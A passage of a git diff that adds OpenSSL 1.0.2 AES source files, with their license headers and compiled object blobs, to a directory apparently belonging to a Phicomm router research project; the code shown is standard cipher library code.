+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ */
+
+#ifndef HEADER_AES_LOCL_H
+# define HEADER_AES_LOCL_H
+
+# include <openssl/e_os2.h>
+
+# ifdef OPENSSL_NO_AES
+#  error AES is disabled.
+# endif
+
+# include <stdio.h>
+# include <stdlib.h>
+# include <string.h>
+
+# if defined(_MSC_VER) && (defined(_M_IX86) || defined(_M_AMD64) || defined(_M_X64))
+#  define SWAP(x) (_lrotl(x, 8) & 0x00ff00ff | _lrotr(x, 8) & 0xff00ff00)
+#  define GETU32(p) SWAP(*((u32 *)(p)))
+#  define PUTU32(ct, st) { *((u32 *)(ct)) = SWAP((st)); }
+# else
+#  define GETU32(pt) (((u32)(pt)[0] << 24) ^ ((u32)(pt)[1] << 16) ^ ((u32)(pt)[2] <<  8) ^ ((u32)(pt)[3]))
+#  define PUTU32(ct, st) { (ct)[0] = (u8)((st) >> 24); (ct)[1] = (u8)((st) >> 16); (ct)[2] = (u8)((st) >>  8); (ct)[3] = (u8)(st); }
+# endif
+
+# ifdef AES_LONG
+typedef unsigned long u32;
+# else
+typedef unsigned int u32;
+# endif
+typedef unsigned short u16;
+typedef unsigned char u8;
+
+# define MAXKC   (256/32)
+# define MAXKB   (256/8)
+# define MAXNR   14
+
+/* This controls loop-unrolling in aes_core.c */
+# undef FULL_UNROLL
+
+#endif                          /* !HEADER_AES_LOCL_H */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_misc.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_misc.c
new file mode 100644
index 0000000..ab948ad
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_misc.c
@@ -0,0 +1,86 @@
+/* crypto/aes/aes_misc.c -*- mode:C; c-file-style: "eay" -*- */
+/* ====================================================================
+ * Copyright (c) 1998-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ */
+
+#include <openssl/opensslv.h>
+#include <openssl/crypto.h>
+#include <openssl/aes.h>
+#include "aes_locl.h"
+
+const char AES_version[] = "AES" OPENSSL_VERSION_PTEXT;
+
+const char *AES_options(void)
+{
+#ifdef FULL_UNROLL
+    return "aes(full)";
+#else
+    return "aes(partial)";
+#endif
+}
+
+/* FIPS wrapper functions to block low level AES calls in FIPS mode */
+
+int AES_set_encrypt_key(const unsigned char *userKey, const int bits,
+                        AES_KEY *key)
+{
+#ifdef OPENSSL_FIPS
+    fips_cipher_abort(AES);
+#endif
+    return private_AES_set_encrypt_key(userKey, bits, key);
+}
+
+int AES_set_decrypt_key(const unsigned char *userKey, const int bits,
+                        AES_KEY *key)
+{
+#ifdef OPENSSL_FIPS
+    fips_cipher_abort(AES);
+#endif
+    return private_AES_set_decrypt_key(userKey, bits, key);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_misc.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_misc.o
new file mode 100644
index 0000000000000000000000000000000000000000..a4763a208a56b8db96959bb0712a3ec7a845b019
GIT binary patch
literal 2152
zcmbtUPfyf96n{%m(4c_Pgou)!3`Ci<3&yC4S-=HiHm<rDJ=v6HkPU3xw6n;1P!rE4
zd<x^oF!AEm8(+br@nVb#zPFuM%51slOQyf~e(%rByw1$qYHfL-R05U~+=C;FS%6Q2
zM|!2FR$vs)!_U#F->V-^5%Y!g@1$jlFO%uWk5$XxnIT8NEL0mdMcCn{U5{kYXw+<1
zIHGKq%k~35u*;5n6JTX&>5e`9biEU(j(uCq31`;5)#;h;o3bOE`I(gF8ECm<IA~=n
z51+ySz-Qtt93&T0fYR$HP}&<SO^yr=@8iZP=Zf}?Xe7?j`WcOsf8XG=SqRkALHKc4
z<g^MqPHW}W9?!C{Qju7_-S&GdINeVoW5MtVJn!<j+k&&l3AEB4_5OdK&w`;oZXB5l
zx&3mF?`ocHUcpu5ssE<TAyLFXL!Rni(g|FrenR{<^5ePwT+?}gN7rk&lBQ^as4Y2w
z2h|HB)e3_Iyp>vgaiQkbmzNvWHE(TUu~zjUid(zBk{(4SQh73H#@$GH+p^o|+mJ^-
zir<xSf~6tr7@pT&xBncbLVY8lKR=3t`O8G25Kl48+o+RJ9U3h2T4A31y=w5>KM+Z`
zt^9RF6{onxS}b>bq2!(dvEeHp#Cno|h(j_c+!ZdHAev#jEdvY<LL~)W$=O8t&24SJ
z3_2o;!$`)ei#b$SZh4!r-<G`c|3e$o=?<DVp@JOAR0`SGd;=%ZLp`o!5vj7TuPFDA
z`boKbvnF&roh#za8~sB2O)%%bfdN$WU-MnerJ7|NdExob<w?|ee#VOC@@I)s-q8mo
zyEmx`wnhf(57pv#l=+WZxz2<}o|o}4@~r1WzvYdbZpQlPqu0n>|AEf2H8Sx3W4ntA
z)im>e>44`PsL{+<$QPZTgM#xzuPo>D`6-&4rh23|`c)(SM>>OMKD~qH*+B{>H2I2*
Xoak~HLvKq_zD=7#d7nb|HS_-hX?(5N

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_ofb.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_ofb.c
new file mode 100644
index 0000000..e6153f9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_ofb.c
@@ -0,0 +1,61 @@
+/* crypto/aes/aes_ofb.c -*- mode:C; c-file-style: "eay" -*- */
+/* ====================================================================
+ * Copyright (c) 2002-2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ */
+
+#include <openssl/aes.h>
+#include <openssl/modes.h>
+
+void AES_ofb128_encrypt(const unsigned char *in, unsigned char *out,
+                        size_t length, const AES_KEY *key,
+                        unsigned char *ivec, int *num)
+{
+    CRYPTO_ofb128_encrypt(in, out, length, key, ivec, num,
+                          (block128_f) AES_encrypt);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_ofb.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_ofb.o
new file mode 100644
index 0000000000000000000000000000000000000000..7e49cfcd9498b14825954a59af484000540a0f63
GIT binary patch
literal 1640
zcmbtT&2G~`5FXcs76@rT93mA}KA|G$Dk(*T9+1;0KcI-9HbrnimK|Iw(KwO4ks1zg
z$b}=1z>!Dbhy)M9kpmaR4IzaYdq;5==K>?GXXf*KJF~O1Z|d#Fl3@Ug0rz0$F$%D0
z&TKn2ZMX<I__?<6t2OyvnBFGv8+}@nFU8N$tkrg{%|mY#$dPqd+!Cd&@|{uamS1m|
zL}}-G0uu#b8CL<<8C=bWhp+_ji7-xk1#J@J)jk-f1!Fz8vic4Sy^0tuk|KRt`C=n)
z-OsO*vsmbi%kX2G6=7y}fNJ4t=2>Q3{X9mV31|NXV|--+o?WyVcV(V(0o}`~I^(k=
zwt<WKsLKulS-8Cb2iK3B!I39=P^}-3Ro<>Re$WfYLkUi^-Px<Qolc{1Q13e3>R!9<
z#DN@9+kg6~+tGOd=T%|nP}3QHPZL>FINf<Jg<A^8d7zn?iHOF1>3Sd{87BIet<XPl
zh4fD)i07_!L3mLFqBrRG{Q$9GAbo)|wiQXY_fq*Uf{_@8gP|YFF^G5v|JXSS-M&A|
z`5%^rT$(w3B5cG+`2G?viDjGgIxgysjVmof)s&I~slSwmCyDpHrf_|NpD3QLXpgkq
zM2GhLSAH3}v?tezW-Ofl1_MfSe%8B)vz-o|q@9$l$3DP+^y=nj2>rK;V=2vw`^UbA
z2JNZyKd68T2P&=epCO)gfA7_Xd{1<L#AQC?S-C0ISNfn-)Pd<u(c9Abgz0yO5ENDZ
X$K<3$@82c-m&O06_$MhYnL7UuzJPkK

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_wrap.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_wrap.c
new file mode 100644
index 0000000..b7b64d5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_wrap.c
@@ -0,0 +1,72 @@
+/* crypto/aes/aes_wrap.c */
+/*
+ * Written by Dr Stephen N Henson (steve@openssl.org) for the OpenSSL
+ * project.
+ */
+/* ====================================================================
+ * Copyright (c) 2008 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ */
+
+#include "cryptlib.h"
+#include <openssl/aes.h>
+#include <openssl/modes.h>
+
+int AES_wrap_key(AES_KEY *key, const unsigned char *iv,
+                 unsigned char *out,
+                 const unsigned char *in, unsigned int inlen)
+{
+    return CRYPTO_128_wrap(key, iv, out, in, inlen, (block128_f) AES_encrypt);
+}
+
+int AES_unwrap_key(AES_KEY *key, const unsigned char *iv,
+                   unsigned char *out,
+                   const unsigned char *in, unsigned int inlen)
+{
+    return CRYPTO_128_unwrap(key, iv, out, in, inlen,
+                             (block128_f) AES_decrypt);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_wrap.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_wrap.o
new file mode 100644
index 0000000000000000000000000000000000000000..0c441defadcfa964d4c9baf6afd37a452ca2f39b
GIT binary patch
literal 1848
zcmbu9UuzRV5Wwe}YNMuU6cMFT?n(UDHK_$_1xXq%5e+7^DQH2?OS-kt<`OO!OnlHj
zD!%xpAH~OlU&dGQrHD{x_IA?C<?><&_Gad{GqZcMxA(!Sl%@;=SPXa!CmvIPqr{1w
zS7sh&AqBtZ7XH*KpJxeKpALVL-ue+wp<FDknm0EaJ=gD<55;|vUCce`DL40iDJ!ze
zw*m|>jde0O&fq9N--IcELt?y*%V?7r@7BTSXN>vOO!5nEocMJ$18{}3mCn@CNyV3A
zxJF}&dN2*Yj>jetBw{;6oOd^xl~8Xp%E(K=*>R}&%mkjCz^O~4l0x@VXrHPV$gbg_
zzDDI9f;j$Y0)K{_>T_MzTNC1UCU9_M*M93c9npk>wV_OVPY%E?SE_4;id`+0Hmtf`
zFRWE8TZKrs=?ywQ6xUzY>Qy_pw4$=qT+gLissL5nmSdqo1aK#B<GwE7_<I}(_kg}N
z>LK$5v`HvFjf43Of+!R}hl9C^HVJ;WYA6REE81YreFM=Qw0x(5+V=vz%a$ki9pTHq
z4`SQ#9T1If7euq&YDpKF+xDfvJF?jIo#vkQ-?%-|@!B2f`2!HDg50%tJf|gjE2q*X
zX44&se!+QUBzFTfd`AB%^Eg92%MT+0<A@rA@>)Fs&ZDMWKCi2qQ{Rb4Z`{6~kE-bU
zv_Go(zxg@LrJ7kBVd3@fgdy6zKI_#G3x|FUJ0Y9%7(GRU{t~)fjNzNM%pnO3?jPd@
z8dNiy|6K<>;XtjU`LB@2o!<-HQ0@zzALVjBpI_YCYAOAq2U^qJJQtHsEP8g7f1qEe
XPfkd5xgoiTR$Tr^4fz~7A)5aWryZbK

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_x86core.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_x86core.c
new file mode 100644
index 0000000..132b09a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/aes_x86core.c
@@ -0,0 +1,1072 @@
+/* crypto/aes/aes_core.c -*- mode:C; c-file-style: "eay" -*- */
+/**
+ * rijndael-alg-fst.c
+ *
+ * @version 3.0 (December 2000)
+ *
+ * Optimised ANSI C code for the Rijndael cipher (now AES)
+ *
+ * @author Vincent Rijmen <vincent.rijmen@esat.kuleuven.ac.be>
+ * @author Antoon Bosselaers <antoon.bosselaers@esat.kuleuven.ac.be>
+ * @author Paulo Barreto <paulo.barreto@terra.com.br>
+ *
+ * This code is hereby placed in the public domain.
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE AUTHORS ''AS IS'' AND ANY EXPRESS
+ * OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+ * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHORS OR CONTRIBUTORS BE
+ * LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+ * CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+ * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
+ * BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
+ * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
+ * OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
+ * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+ */
+
+/*
+ * This is experimental x86[_64] derivative. It assumes little-endian
+ * byte order and expects CPU to sustain unaligned memory references.
+ * It is used as playground for cache-time attack mitigations and
+ * serves as reference C implementation for x86[_64] assembler.
+ *
+ *                  <appro@fy.chalmers.se>
+ */
+
+
+#ifndef AES_DEBUG
+# ifndef NDEBUG
+#  define NDEBUG
+# endif
+#endif
+#include <assert.h>
+
+#include <stdlib.h>
+#include <openssl/aes.h>
+#include "aes_locl.h"
+
+/*
+ * These two parameters control which table, 256-byte or 2KB, is
+ * referenced in outer and respectively inner rounds.
+ */
+#define AES_COMPACT_IN_OUTER_ROUNDS
+#ifdef  AES_COMPACT_IN_OUTER_ROUNDS
+/* AES_COMPACT_IN_OUTER_ROUNDS costs ~30% in performance, while
+ * adding AES_COMPACT_IN_INNER_ROUNDS reduces benchmark *further*
+ * by factor of ~2. */
+# undef  AES_COMPACT_IN_INNER_ROUNDS
+#endif
+
+#if 1
+static void prefetch256(const void *table)
+{
+    volatile unsigned long *t=(void *)table,ret;
+    unsigned long sum;
+    int i;
+
+    /* 32 is common least cache-line size */
+    for (sum=0,i=0;i<256/sizeof(t[0]);i+=32/sizeof(t[0]))   sum ^= t[i];
+
+    ret = sum;
+}
+#else
+# define prefetch256(t)
+#endif
+
+#undef GETU32
+#define GETU32(p) (*((u32*)(p)))
+
+#if (defined(_WIN32) || defined(_WIN64)) && !defined(__MINGW32__)
+typedef unsigned __int64 u64;
+#define U64(C)  C##UI64
+#elif defined(__arch64__)
+typedef unsigned long u64;
+#define U64(C)  C##UL
+#else
+typedef unsigned long long u64;
+#define U64(C)  C##ULL
+#endif
+
+#undef ROTATE
+#if defined(_MSC_VER)
+# define ROTATE(a,n)    _lrotl(a,n)
+#elif defined(__ICC)
+# define ROTATE(a,n)    _rotl(a,n)
+#elif defined(__GNUC__) && __GNUC__>=2
+# if defined(__i386) || defined(__i386__) || defined(__x86_64) || defined(__x86_64__)
+#   define ROTATE(a,n)  ({ register unsigned int ret;   \
+                asm (           \
+                "roll %1,%0"        \
+                : "=r"(ret)     \
+                : "I"(n), "0"(a)    \
+                : "cc");        \
+               ret;             \
+            })
+# endif
+#endif
+/*-
+Te [x] = S [x].[02, 01, 01, 03, 02, 01, 01, 03];
+Te0[x] = S [x].[02, 01, 01, 03];
+Te1[x] = S [x].[03, 02, 01, 01];
+Te2[x] = S [x].[01, 03, 02, 01];
+Te3[x] = S [x].[01, 01, 03, 02];
+*/
+#define Te0 (u32)((u64*)((u8*)Te+0))
+#define Te1 (u32)((u64*)((u8*)Te+3))
+#define Te2 (u32)((u64*)((u8*)Te+2))
+#define Te3 (u32)((u64*)((u8*)Te+1))
+/*-
+Td [x] = Si[x].[0e, 09, 0d, 0b, 0e, 09, 0d, 0b];
+Td0[x] = Si[x].[0e, 09, 0d, 0b];
+Td1[x] = Si[x].[0b, 0e, 09, 0d];
+Td2[x] = Si[x].[0d, 0b, 0e, 09];
+Td3[x] = Si[x].[09, 0d, 0b, 0e];
+Td4[x] = Si[x].[01];
+*/
+#define Td0 (u32)((u64*)((u8*)Td+0))
+#define Td1 (u32)((u64*)((u8*)Td+3))
+#define Td2 (u32)((u64*)((u8*)Td+2))
+#define Td3 (u32)((u64*)((u8*)Td+1))
+
+static const u64 Te[256] = {
+    U64(0xa56363c6a56363c6), U64(0x847c7cf8847c7cf8),
+    U64(0x997777ee997777ee), U64(0x8d7b7bf68d7b7bf6),
+    U64(0x0df2f2ff0df2f2ff), U64(0xbd6b6bd6bd6b6bd6),
+    U64(0xb16f6fdeb16f6fde), U64(0x54c5c59154c5c591),
+    U64(0x5030306050303060), U64(0x0301010203010102),
+    U64(0xa96767cea96767ce), U64(0x7d2b2b567d2b2b56),
+    U64(0x19fefee719fefee7), U64(0x62d7d7b562d7d7b5),
+    U64(0xe6abab4de6abab4d), U64(0x9a7676ec9a7676ec),
+    U64(0x45caca8f45caca8f), U64(0x9d82821f9d82821f),
+    U64(0x40c9c98940c9c989), U64(0x877d7dfa877d7dfa),
+    U64(0x15fafaef15fafaef), U64(0xeb5959b2eb5959b2),
+    U64(0xc947478ec947478e), U64(0x0bf0f0fb0bf0f0fb),
+    U64(0xecadad41ecadad41), U64(0x67d4d4b367d4d4b3),
+    U64(0xfda2a25ffda2a25f), U64(0xeaafaf45eaafaf45),
+    U64(0xbf9c9c23bf9c9c23), U64(0xf7a4a453f7a4a453),
+    U64(0x967272e4967272e4), U64(0x5bc0c09b5bc0c09b),
+    U64(0xc2b7b775c2b7b775), U64(0x1cfdfde11cfdfde1),
+    U64(0xae93933dae93933d), U64(0x6a26264c6a26264c),
+    U64(0x5a36366c5a36366c), U64(0x413f3f7e413f3f7e),
+    U64(0x02f7f7f502f7f7f5), U64(0x4fcccc834fcccc83),
+    U64(0x5c3434685c343468), U64(0xf4a5a551f4a5a551),
+    U64(0x34e5e5d134e5e5d1), U64(0x08f1f1f908f1f1f9),
+    U64(0x937171e2937171e2), U64(0x73d8d8ab73d8d8ab),
+    U64(0x5331316253313162), U64(0x3f15152a3f15152a),
+    U64(0x0c0404080c040408), U64(0x52c7c79552c7c795),
+    U64(0x6523234665232346), U64(0x5ec3c39d5ec3c39d),
+    U64(0x2818183028181830), U64(0xa1969637a1969637),
+    U64(0x0f05050a0f05050a), U64(0xb59a9a2fb59a9a2f),
+    U64(0x0907070e0907070e), U64(0x3612122436121224),
+    U64(0x9b80801b9b80801b), U64(0x3de2e2df3de2e2df),
+    U64(0x26ebebcd26ebebcd), U64(0x6927274e6927274e),
+    U64(0xcdb2b27fcdb2b27f), U64(0x9f7575ea9f7575ea),
+    U64(0x1b0909121b090912), U64(0x9e83831d9e83831d),
+    U64(0x742c2c58742c2c58), U64(0x2e1a1a342e1a1a34),
+    U64(0x2d1b1b362d1b1b36), U64(0xb26e6edcb26e6edc),
+    U64(0xee5a5ab4ee5a5ab4), U64(0xfba0a05bfba0a05b),
+    U64(0xf65252a4f65252a4), U64(0x4d3b3b764d3b3b76),
+    U64(0x61d6d6b761d6d6b7), U64(0xceb3b37dceb3b37d),
+    U64(0x7b2929527b292952), U64(0x3ee3e3dd3ee3e3dd),
+    U64(0x712f2f5e712f2f5e), U64(0x9784841397848413),
+    U64(0xf55353a6f55353a6), U64(0x68d1d1b968d1d1b9),
+    U64(0x0000000000000000), U64(0x2cededc12cededc1),
+    U64(0x6020204060202040), U64(0x1ffcfce31ffcfce3),
+    U64(0xc8b1b179c8b1b179), U64(0xed5b5bb6ed5b5bb6),
+    U64(0xbe6a6ad4be6a6ad4), U64(0x46cbcb8d46cbcb8d),
+    U64(0xd9bebe67d9bebe67), U64(0x4b3939724b393972),
+    U64(0xde4a4a94de4a4a94), U64(0xd44c4c98d44c4c98),
+    U64(0xe85858b0e85858b0), U64(0x4acfcf854acfcf85),
+    U64(0x6bd0d0bb6bd0d0bb), U64(0x2aefefc52aefefc5),
+    U64(0xe5aaaa4fe5aaaa4f), U64(0x16fbfbed16fbfbed),
+    U64(0xc5434386c5434386), U64(0xd74d4d9ad74d4d9a),
+    U64(0x5533336655333366), U64(0x9485851194858511),
+    U64(0xcf45458acf45458a), U64(0x10f9f9e910f9f9e9),
+    U64(0x0602020406020204), U64(0x817f7ffe817f7ffe),
+    U64(0xf05050a0f05050a0), U64(0x443c3c78443c3c78),
+    U64(0xba9f9f25ba9f9f25), U64(0xe3a8a84be3a8a84b),
+    U64(0xf35151a2f35151a2), U64(0xfea3a35dfea3a35d),
+    U64(0xc0404080c0404080), U64(0x8a8f8f058a8f8f05),
+    U64(0xad92923fad92923f), U64(0xbc9d9d21bc9d9d21),
+    U64(0x4838387048383870), U64(0x04f5f5f104f5f5f1),
+    U64(0xdfbcbc63dfbcbc63), U64(0xc1b6b677c1b6b677),
+    U64(0x75dadaaf75dadaaf), U64(0x6321214263212142),
+    U64(0x3010102030101020), U64(0x1affffe51affffe5),
